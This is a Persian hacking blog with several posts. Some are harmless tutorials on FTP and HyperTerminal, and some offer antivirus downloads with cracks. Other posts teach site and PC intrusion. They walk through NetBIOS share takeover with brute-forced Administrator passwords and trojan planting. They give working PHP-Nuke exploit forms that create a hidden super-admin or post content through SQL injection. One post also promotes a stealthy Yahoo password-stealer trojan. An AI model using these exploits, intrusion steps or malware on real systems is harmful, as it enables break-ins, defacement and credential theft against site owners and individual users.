آموزش هک سایت

من اومدم

hack-king — Fri, 08 Dec 2006 16:12:46 GMT

بعد از دو سال آخرش آپدایت کردم! با اینکه هک و هک کردن رو کنار گذاشتم ولی اومدم آپدایت کنیم! قول میدم مطالب هم براتون بزارم ولی نه مثل گذشته! ۲ سال هیت که اپدایت نکردم و میشه گفت تو این دو سال سبک هکر ها کلی فرق کرده! ولی من به نه خیلی حرفه ای و نه خیلی آماتور بالا بردن امنیت سیستم عامل ویندور را با شما کار می کنم.

۱. امروز با یه آدم اسکل چت کردم که یاهو رو هک کرده! lol متن چت اینجاست

۲. یک برنامه برای حذف ویروس جدید یاهو که البته قدیمی شد ولی خیلیا هنوز نوفمن

یکی از قوی ترین و شایعترین ویروس/تروجان هایی که اخیرآ در حال گسترش بین کاربران استفاده کننده از یاهو مسنجر می باشد ویروس "Exploit.JS.ADODB.Stream.e" است. در صورتیکه کامپیوتر شما نیز به این ویروس آلوده شده باشد بدون آنکه متوجه شوید به لیست دوستانتان پیغامهایی مبنی بر بازدید از سایت nsl-school.org ارسال می شود. بدین ترتیب در صورت کلیک بر روی این لینکها دوستان شما نیز آلوده خواهند شد.
هنوز مشخص نیست سازنده این ویروس چه کسی است و این احتمال داده می شود که ویروس مذکور به سرقت اطلاعات و رمز های شخصی افراد می پردازد. در صورتیکه شما و یا یکی از دوستانتان به این ویروس آلوده شده شده اید روش زیر مناسبترین گزینه برای از بین بردن آن است:

پیام و لینک هایی که این ویروس ارسال می کند چیست ؟!
در متن تمامی این پیغام ها لینکی به سایت Nsl-school.org داده شده است که در صورت کلیک کردن بر روی آن کامپیوتر شما آلوده می شود.

در صورتیکه به ویروس آلوده شوید چه مشکلاتی پیش خواهد آمد ؟!
1- در ابتدا ویروس صفحه شخصی اینترنت اکسپلورر (Default IE Page) را به سایت nsl-school.org تغییر می دهد. در این صورت به هیچ طریق امکان عوض کردن آن وجود نخواهد داشت. بعد از هر باز باز کردن یک صفحه وب جدید، ویروس مجددآ خود را در سیستم شما کپی می کند.

2- گزینه های Task Manager و Reg Edit در کامپیوتر غیر فعال می شوند تا شخص نتواند از این طریق فعالیت ویروس را مشاهده و یا از بین ببرد.

3- فایل هایی با نامهای svhost.exe , svhost32.exe , internat.exe در کامپیوتر ایجاد می شوند. (برای اطمینان پوشه های windows و temp را بررسی کنید.)

4- ویروس بدون آنکه متوجه شوید پیغام هایی را به لیست دوستان شما (Yahoo Messenger ID List) ارسال می کند.

چگونه ویروس را از کامپیوتر خود پاک کنیم ؟!
راه ها و روش های مختلفی برای حذف این ویروس معرفی شده است.
ولی روش معرفی شده در اینجا راحت ترین روش است!
فایل زیر را دانلود کنید و سپس فایل YVRemove.bat را از داخل آن اجرا نمائید.

Download 4 KB

password : www.p30download.com

2 نسخه آنتی ویرووس

hack-king — Fri, 02 Sep 2005 20:56:21 GMT

سلام دوستان

اونایی که به فکر امنیت کامپیوتر خود هستند این پست را مطالعه کنند. امنیت کامپیوتر خود را بالا ببرید و جان این یار خوب را به دست ویرووس ها نسپارید
آنتی ویرووس های جدید آماده ی دریافت شدند : می دونید مه محصولات ۲۰۰۴ همشون تو آرشیو دی ماه باهم جمع شدن! ولی حالا باید محصولات ۲۰۰۶ را جمع کنیم فقط McAfee و Norton در سال ۲۰۰۵ آپدایت شدند ولی امسال همه ی آنتی ویرروس های جهان آپدایت میشنو ما هم به تریتیب می ریم سراغ برترین آنتی ویرروس ها:
می پردازیم به تجزیه و تحلیل McAfee ViruseScan 2.0.21 (راستش ورژن جدید تری هم داست متاسفانه لینکش خراب بود ولی فرق این ۲ ورژن در یک هفته هست)
این آنتی ویرووس ویژگی های منحصر به فردی دارد که از جمله ی آنها :
ـ به صورت خودکار spyware ها و adware ها را شناسايي و تعيين هويت مي کند و آنها را يا بلوکه مي کند و يا آنها را از بين مي برد ، اين نرم افزار توانايي شناختن اين دو جاسوس را در برنامه هايي که به روي سيستم شما نصب شده است و شما از بودن جاسوسها در آن برنامه خبر نداريد را دارد .
ـ به صورت خودکار سيستم شما محافظت مي شود و سيستم شما را از هر خطري که بي مقدمه شما را تهديد مي کند حفظ مي کند .
ـ به صورت خودکار تمامي ويروسها ، کرمها ، تروژان ها ، اکتيو ايکسها و چيزهاي خطرناک ديگر را کشف مي کند و پاک سازي يا از بين مي برد .

در کل اين برنامه بسيار معروف و کارا مي باشد ، اين نرم افزار در بين افرادي که دوست دارند روي سيستم خود يک آنتي ويروس نصب کنند بيشتر به چشم مي خورد تا برنامه هاي ديگر .
از من میشنوید این آنتی ویرووس را جایگزین آنتی ویرووس قبلی کنید و از آن نهایت استفاده رو ببرید !

Size : 9,570 KB

Download McAfee ViruseScan 10.0.21 Now + Crack

حالا میریم سراغ آنتی ویرووسی که محبوبیت آن به قدر محبوبیت McAfee هست و استفاده ی زیادی داره و معروف هست : Norton AntiViruse 2006 Beta
در کنار نام این ضد ویرووس مشهور کلمه ی Beta مشاهده می شود که در مورد این کلمه توضیح خاصی نیاز هست! این کالمه با هر برنامه ای بیاد یعنی این نسخه ی آزمایشی برنامه هست و بدین معنا است که این برنامه را به خاطر آرمایش بیرون داده اند و نسخه ی اصلی آن یا Full Version نسخه ای خواهد بود که در آن خطا های ورژن Beta گرفته شده و وقعا آنتی ویرووس خوبی هست!
این آنتی ویرووس از ساخته های شرکت Symantec هست . همونطور که من در توضیح انگیلیش در سایت خودش خوندم این آنتی ویرووس تمام ویرووس ها و کرم ها و اسب های تروا را شناسایی می کند و بدون گرفتن وقت شما آنها را از روی سیستم شما پاکسازی می کند!

Size : 27,600 KB

Download Norton AntiViruse 2006 + Crack

خوب برای امروز کافیه! تا پس فردا (نسخه های FireWall های مختلف) (دیگر محصولات ۲۰۰۶ Norton ) را برای شما آپدایت می کنم. و به محض پیدا کردنه لینک سالم Kaspersky Prosenal AntiViruse لینکشو میزارم! به همه ی نظرات هم جواب داده میشه تنها خواهش من از شما:

*** تمامی ایرانیان عزیز برای کپی برداری از این مطلب نوشتن نا منبع به صورت فعال واجب هست ممنون از همکاری شما***

اقدامات امنیتی

hack-king — Mon, 29 Aug 2005 23:40:17 GMT

سلام دوستان
اقدامات جدید امنیتی برای کامپوتر شما از هم اکنون در این وبلاگ برای شما آموزش داده میشود اما این آموزش ها خصوصی هستند و خرج اندکی نیز دارد و سیستم شما نیازی به سیستم اینترنتی DSL دارد این سیستم اتصال به اینترنت با سرعت های فوق العاده هستند.
وگرنه شما باید با ما تماس بگیرید تا برنامه های امنیتی را برای شما از طریق پست ارسال کنیم برای اشتراک در این خدمات فرمی که در منو سمت چپ قسما پایین هست رو پر کنید!

۱-ارسال یکسری برنامه و آموزش منتی (۹۰۰۰) تومان
۲-ارسال جدید ترین برنامه ها و آموزش تصویری آن (۲۱۰۰۰) تومان!

موفق باشید

دروس پورت 21 قسمت دوم

hack-king — Fri, 26 Aug 2005 23:01:58 GMT

◊ چطوري يه سرور پيدا کنم که سرويس ftp روي اون فعال باشه؟
اين سوال دو حالت داره:
۱- مي‌خواهيد به صورت anonymous وارد بشين يعني username و password ندارين. براي اين حالت مي‌تونين از خيلي از سايت‌ها استفاده کنيد. مثلا مي‌تونين از ftp.microsoft.com استفاده کنيد يا سايت‌هاي ديگه.
۲- اگه مي‌خوايد به صورت غير anonymous کار کنيد، حيطه عمل‌تون محدود به سايت‌هايي ميشه که username و password واسه اون دارين. مثلا اگه شما سايتي روي اينترنت داشته باشيد ( چه سايت پولي و چه سايت مجاني مثلا در netfirms و geocities و ... ) به شما يک آدرس ftp و يک username و password تعلق مي‌گيره که از طريق اون کار مي‌کنيد. اگه سايت نداريد، مي‌تونيد يک سايت مجاني درست کنيد. مثلا مي‌تونيد از سايت geocities.com که متعلق به ياهو است استفاده کنيد. يا از سايت‌های netfirms.com يا freeservers.com و... ولي به‌هر حال در يکي از اين‌ها ثبت‌نام کنيد و username و password بگيريد. آدرس‌هاي ftp آنها هم که به‌صورت ftp.geocities.com يا ftp.netfirms.com و... خواهد بود. (از من نخواين که طريقه ثبت‌نام در اين سايت‌ها رو هم به شما ياد بدم! کار خيلي راحتيه.)

◊ با پورت ۲۱ صحبت کنيم
فرض کنيد من از يک سايت فرضي استفاده مي‌کنم که آدرس ftp اون باشه: ftp.somesite.com و username من باشه ali1000 و پسوردم هم يه چيزه ديگه باشه. حالا مي‌خوام از طريق پورت ۲۱ با اين سايت ارتباط برقرار کنم. در مورد اين پورت ديگه از nc و telnet استفاده نمي‌کنم، بلکه از برنامه‌اي که در تمام ويندوز‌ها هست، به اسم ftp کمک مي‌گيرم. در command prompt مي‌نويسم:
ftp ftp.somesite.com
و جواب مي‌شنوم:
Connected to somesite.com.
220 somesite Microsoft FTP Service (Version 5.0).
User (somesite.com:(none)):
دقت کنيد که اين سايت ftp server اش از نوع Microsoft است، پس اين سرور از سيستم‌عامل ويندوز استفاده مي‌کنه ( دونستن اين نکات لازم نيست، ولي من توصيه مي‌کنم که هميشه به جزئيات توجه کنيد) دقت کنيد که از من username رو مي‌خواد، پس مي‌نويسم: ali1000 و Enter رو فشار مي‌دم. جواب مي‌آد:
331 Password required for ali1000.
Password:
حالا ازم پسورد مي‌خواد و پسورد رو تايپ مي‌کنم. جواب مي‌شنوم:
230 User ali1000 logged in.
ftp>
اين نشون ميده که تونستم با پورت ۲۱ کامپيوتر مقابل ارتباط برقرار کرده و اصطلاحا يک session يا نشست! باهاش داشته باشم. اگه username يا password اشتباه بود، اون موقع مي‌گفت:
530 User ali1000 cannot log in.
Login failed.
ftp>
من فرض مي‌کنم که session با موفقيت برقرار شده، حالا تايپ مي‌کنم:
ftp> help
و جواب مي‌شنوم:
Commands may be abbreviated. Commands are:

! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
اين‌ها ليست دستوراتي است که مي‌تونيد استفاده کنيد. من فقط اون‌هايي که به صورت bold مشخص کردم رو توضيح خواهم داد. بقيه دستورات کمتر به کار مي‌رن.

بازم ادامه داره

دروس پورت 21 قسمت اول

hack-king — Thu, 25 Aug 2005 22:31:38 GMT

◊ پورت ۲۱ چيست؟
پورت ۲۱ رو پورت ftp مي‌گن. ftp مخفف عبارت file transfer protocol است يعني پروتکل انتقال فايل. کاربرد اين پروتکل و اين پورت از زماني وجود داره که حتي وب (پورت ۸۰ ) هم چندان عمومي نشده بود. پس مي‌تونم بگم که يه پروتکل باستاني هستش. وقتي مي‌خواهيد با يک سرور از طريق اين پروتکل صحبت کنيد، بايد مطمئن بشين که سرويس مربوط به ftp روي اون کامپيوتر فعال باشه. به عبارت ديگه بايد يک ftp server روي اون کامپيوتر در حال اجرا باشه. حالا شما با اون کامپيوتر مي‌خواين ارتباط برقرار کنين، پس شما بايد از يک ftp client استفاده کنيد. پس شما کلاينت هستيد و دستگاه مقابل سرور!
حالا شايد بپرسين که کار ftp چيست؟
ftp براي انتقال فايل به کار ميره و اين انتقال فايل در دو جهت ممکنه که upload و download گفته ميشه. براي اينکه اين‌ها رو قاطي نکنيد با هم فرض کنيد که کامپيوتر سرور بالای سر شما قرار گرفته، پس وقتي فايل رو از اون مي‌گيريد، فايل به سمت پايين مي‌آد (download) و وقتي فايل رو براي سرور مي‌فرستيد، حالت برعکس مي‌باشد و بهش مي‌گيم، upload کردن. و هر دو عبارت نوعي انتقال فايل محسوب ميشه. دقت کنيد که انتقال فايل از طريق پروتکل‌هاي ديگه‌اي هم امکان‌پذيره مثل web و ... ولي ما بحث‌مون همين پروتکل ftp است.
عبارت ديگه‌اي که راجع به اين پورت بايد ياد بگيريد، عبارت anonymous است. براي توضيح اين عبارت اول بايد بگم که وقتي شما مي‌خواهيد با سرور ارتباط برقرار کنيد، همين‌طوري کشکي که نيس! براي ارتباط با سرور از شما username و password پرسيده مي‌شه و اگه درست باشه مي‌تونين فايل‌ها رو upload و download کنيد و تغيير بديد ( پس مي‌بينيد که اين پروتکل پروتکل حساسي است و اگه هک بشه خيلي کارها ميشه باهاش کرد). اين حالت که گفتم در حالتي ممکنه که شما username و password داشته باشيد. اما گاهي پيش مي‌آد که username و password نداريم و مي‌خوايم با پورت ftp يک سرور يا سايت ارتباط برقرار کنيم. در اين حالت معمولا فقط اجازه download به ما داده ميشه و اجازه upload و يا اعمال تغييرات در فايل‌ها رو نداريم و اونو حالت anonymous يا ناشناس مي‌گن. در اين حالت وقتي از ما username خواسته ميشه، عبارت anonymous را تايپ مي‌کنيم و بعد که پسورد پرسيده ميشه، شما بايد E-mail تون رو وارد کنيد، ولي من مي‌گم که به جاي E-mail واقعي تون يه E-mail الکي بنويسين مثلا alaki@dolaki.com !!
آدرسي که براي ftp با يه سرور استفاده مي‌کنيم به چه شکلي است؟
آدرسي که استفاده مي‌کنيم بستگي به سرور داره ولي معمولا ساختار ثابتي داره. ( اگه يادتون باشه واسه web مثلا مي‌نوشتيم، www.far30.com ) حالا براي ftp مي‌نويسيم، ftp.far30.com پس مثلا براي سايت sazin.com مي‌نويسيم، ftp.sazin.com که آدرس ftp سايت ميشه.

ادامه دارد...

آموزش هک سایت کامل

hack-king — Sat, 13 Aug 2005 12:22:22 GMT

سلام دوستان
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست!
نفوذ به سيستم از طريق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نويسنده : فرشاد عزيز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.

<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>

خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!

موفق باشید

کپی برداری فقط با ذکر منبع به صورت فعال www.eblis-empire.tk مجاز می باشد!

ایمیل 1 ترا بایتی

hack-king — Sun, 03 Jul 2005 15:34:23 GMT

سلام دوستان
اول از همه حجم ها رو برای شما توضیح میدم. به ترتیب
بیت
۸ بیت = ۱ بایت
۱۰۲۴ بایت = ۱ کیلو بایت KB
1024 کیلو بایت = ۱ مگابایت MG
۱۰۲۴ مگا بایت = ۱ گیگا بایت GB
۱.۲۴ مگا بایت = ۱ ترابایت TB

حالا ایمیل یاهو را بررسی می کنیم که حجمی که برای Inbox می دهد ۱ GB یا 1024 MB هست که حجمی هنگفت و زیاد محسوب می شود! و سرور جیمایل هم که ۲ GB می دهد!
حالا کسی ایمیل ۱ TB میخواد؟

هر کی ایمیل ۱ TB می خواد اینجا کلیک کنه

***کپی برداری به ذکر منبع به صورت www.eblis-empire.tk مجاز می باشد و در غیر اینصورت پیگرد غیر قانونی دارد***

برنامه : Toxic-ps 2.0

hack-king — Tue, 07 Jun 2005 20:16:51 GMT

بچه ها سلام .

يه سورپرايز خيلی گنده :‌

Toxic-ps 2.0

قیمت : مجانی
نویسنده : www.mytoxic.tk
لینک داونلود : http://home.ripway.com/2004-11/206098/Toxic-Ps2.0.zip
توضیح :
Toxic-ps 2.0 یه پسورد سندر که رمز یاهو رو می فرسته . شناسایی این پسورد سندر بسیار سخت و در عین حاال بازده اون بسیار بالاست.
این پسورد سندر که در نوع خودش منحصر بفرد هست فابلیت های زیادی رو داره :
1-فرستادن پسورد به 3 صورت مختلف : الف - به ID شخص می فرسته . ب-به Email شخص می فرسته ج-از روش ارسال به یک صفحه ی Asp پسورد رو می فرسته

2-رد شدن از فایروال.

3- فابلیت غیر فعال کردن فایروال و آنتی ویروس .

4- عدم شناخته شدن توسط آنتی ویروس.

5-حجم بسیار کم (13 کیلو بایت ) .

6-فرستادن پسورد بدون تغییر توپی .

7-فرستادن پسورد به روش OnTime طوری که بعد از اینکه ویروس تو کامپیوتر هدف اجرا شد اگه یاهومسنجر آنلاین باشه بلافاصله پسورد و آی دی رو می فرسته .

8-ارسال یوزرنیم ویندوز.

9-مخفی موندن در TaskManager .

10- استارت آپ مخفی در Msconfig

11-غیر فعال فعال کردن Msconfig به این گزینه احتیاجی نیست .

12- غیر فعال کردن Registry

13-غیر فعال کردن Save Password در یاهو مسنجر .

14-مخفی ماندن در آرشیو شخص هک شده .

15-پیغام خطای قلابی .

16-امکان انتخاب آیکون فایل .

17-کارکرد سرور با پسوندهای exe,bat,scr,pif,cmd

18-امکان تبدیل شدن به یک Worm که خودش رو در فلاپی ها کپی می کنه . از این ویژگی که یکی از جالبترین فابلیت ها این پسورد سندر هست می شه تو تایپ و تکثیری ها استفاده کرد .

آموزش هك سايتهای Php Nuke

hack-king — Sun, 05 Jun 2005 23:23:58 GMT

آموزش هك سايتهای Php Nuke

سلام خدمت تمامی دوستان خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و...

به نظر من ساده ترین راه هک کردن و دیفیس کردن سایتها استفاده از باگ های phpnuke هست که به شما اجازه میده به ساده ترین راه به سایت نفوذ کنید..

من برای شما دوستان میخوام چند تا باگ جدید رو بزارم تا ازشون استفاده کنین.
برای شروع به گوگل برید (www.google.com) و بعد باید دنبال سایت هایی که از سیستم phpnuke استفاده میکنن بگردید , شاید بگید چه جوری؟
برای این کار کافیه این نوشته رو کپی و پیست کنید.
كد:
modules.php?name=Downloads

این ماژول در تمامی ورژن های php nuke وجود داره.
خوب بعد از این کار گوگل کلی سایت که از سیستم phpnuke استفاده میکنن میاره
برید رویه یکی از لینکها کلیک کنید وقتی سایت باز شد باید ببینید که شاخه phpnuke چیه
ممکنه به این شکلها باشه:
كد:
http://www.sitename.com/phpnuke/mod...?name=Downloads www.sitename.com/html/modules.php?name=Downloads http://www.sitename.com/portal/modu...?name=Downloads www.sitename.com/modules.php?name=Downloads

برای اینکه بتونیم از این روش سایتها رو هک کنیم باید فایل admin.php رو سایت باشه
برای اینکه بدونین هست یا نه
كد:
modules.php?name=Downloads

اینو پاک کنین و جاش بنویسید admin.php
مثلآ:
كد:
www.sitename.com/admin.php

اگه صفته وارد کردن نام کاربری و پسورد اومد یعنی وجود داره و اگه هم با Error برخورد کردید معلوم میشه که مدیر سایت فایل admin.php رو برداشته.
اگه admin.php بود که به مرتله بعدی میرید اگر هم نبود اون سایت رو بی خیال شید.

خوب تالا ما فرض میکنیم که admin.php وجود داره.

من به شما چند تا باگ میدم که از طریق اونا شما بتونین به سیستم مدیریت سایت نفوذ کنید و به راتتی بتونین سیستم مدیریت سایت رو به دست بگیرید.

شما برای اجرای این کد ها Notepad رو باز کنید کد رو داخلش بنویسید و از منویه File گزینه Save As.. رو انتخاب کنید و هر کجا که میخواین با نام دلخواه تون Save کنید البته بعد از اینکه نام فایل رو نوشتید پسوند اونو .HTML بزارید.

بعد فایلتونو داخل Notepad باز کنید و به جای [sitename] آدرس سایتی رو که میخواین هک کنین رو بنویسید.

کد اول: با استفاده از این میتونین داخل سایت یه کاربر با امکانات ادمین سایت ایجاد کنید و سپس
وارد سیستم مدیریت سایت بشید و سایت رو هک کنید.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>

کد دوم: با این کد میتونین یه خبر رو بدونه ورود به سیستم مدیریت به سایت بفرستید.

كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="add_title"> <br> CONTENT: <textarea name="add_content" rows=10 cols=50></textarea> <br> DATE: <input type="text" name="add_mdate"> <br> E-MAIL: <input type="text" name="add_expire"> <br> <input type="hidden" name="add_expire" value="0"> <br> <input type="hidden" name="add_active" value="1"> <br> <input type="hidden" name="add_view" value="1"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="addmsg"> </p> <p> <input type="submit" name="Submit" value="Post this message"> <br> </p>

کد سوم: این کد هم تقریبآ مثل کد بالا عمل میکنه.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="title"> <br> CONTENT: <textarea name="content" rows=10 cols=50></textarea> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="massmail_send"> </p> <p> <input type="submit" name="Submit" value="Send to target site newsletter"> <br> </p> </form>

خوب اینم از آموزش هک کردن سایتهای popnuke از این روش

امیدوارم به کارتون بخوره

اگه کسی روش دیگه ای بلد هست اینجا بگه ممون

راستی اگه می خواین سایت های ایرانی که از php nuke استفاده می کنند را پیدا کنید کافیه

به googel برید و عبارت Farsi project by PHP-Nuke را بنویسید .

منبع: www.demonteam.net

Hyper Terminal آموزش

hack-king — Sun, 05 Jun 2005 23:21:38 GMT

معرفی:
Hyper terminal از برنامه های بسیار قوی ویندوز برای انتقال اطلاعات می باشد با این برنامه می توان بدون اتصال به اینترنت برای دیگران فایل بفرستید و یا برای آنها پیام بگذارید .
طرز کار :
· این برنامه را ویندوز به صورت پیش فرض دارد و شما می توانید با رفتن به منوی start سپس All programs و بعد از آن به زیر شاخه accessories سپس communication را انتخاب کرده و در آخر Hyper terminal را اجرا کنید .

· وقتی برنامه را اجرا کردید صفحه ای ظاهر می شود که در آن باید برای ارتباط خود اسم بگذارید و سپس روی OK کلیک کنید.

· سپس در صفحه باز شده باید شماره تلفن مورد نظر را وارد کنید.

· بعد از وارد کردن شماره تلفن در صفحه بعد باید روی دکمه dial کلیک کنید . بعد از اینکه ارتباط برقرار شد صفحه ای باز می شود که در آن امکانات متفاوتی وجود دارد از جمله دو دکمه است که شما با یکی از آنها می توانید محل فایلی را که می خواهید بفرستید مشخص کنید و برایش بفرستید و دکمه دیگر برای گرفتن فایل است که محل ریخته شدن فایل را مشخص می کند.

توجه: در کامپیوتری که شما به آن می خواهید متصل شوید باید فرد قبلا آنرا در حالت wait for call قرار دهد . برای این منظور فرد باید وارد منوی call شود و روی wait for call کلیک کند .

Hyper terminal از برنامه هاي خوده ويندوزه لينك نمي خواد ... مسيرشم اينه :
\Start Menu\Programs\Accessories\Communications\HyperTerminal